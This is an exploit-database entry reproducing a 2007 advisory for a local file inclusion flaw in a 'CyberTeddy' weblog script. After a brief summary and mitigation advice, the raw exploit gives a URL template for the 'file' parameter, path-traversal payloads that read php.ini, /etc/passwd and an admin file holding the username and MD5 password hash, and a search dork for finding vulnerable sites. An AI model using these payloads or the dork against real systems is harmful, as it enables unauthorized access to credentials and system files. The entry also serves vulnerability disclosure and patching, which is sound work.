Local File Inclusion Exploit

vendor:

by:

Dj7xpl

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name:

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Local File Inclusion Exploit

This exploit allows an attacker to include local files on the target system by manipulating the 'file' parameter in the URL. By specifying a relative path to a sensitive file, such as the PHP configuration file or the password file, the attacker can view the contents of these files.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.

Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :   http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
#
#
#   Exploit :   http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :   http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
#               http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
#               http://localhost/blog/index.php?show=showarticles&file=../admin.php   <<< username&password(md5)        
#    
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]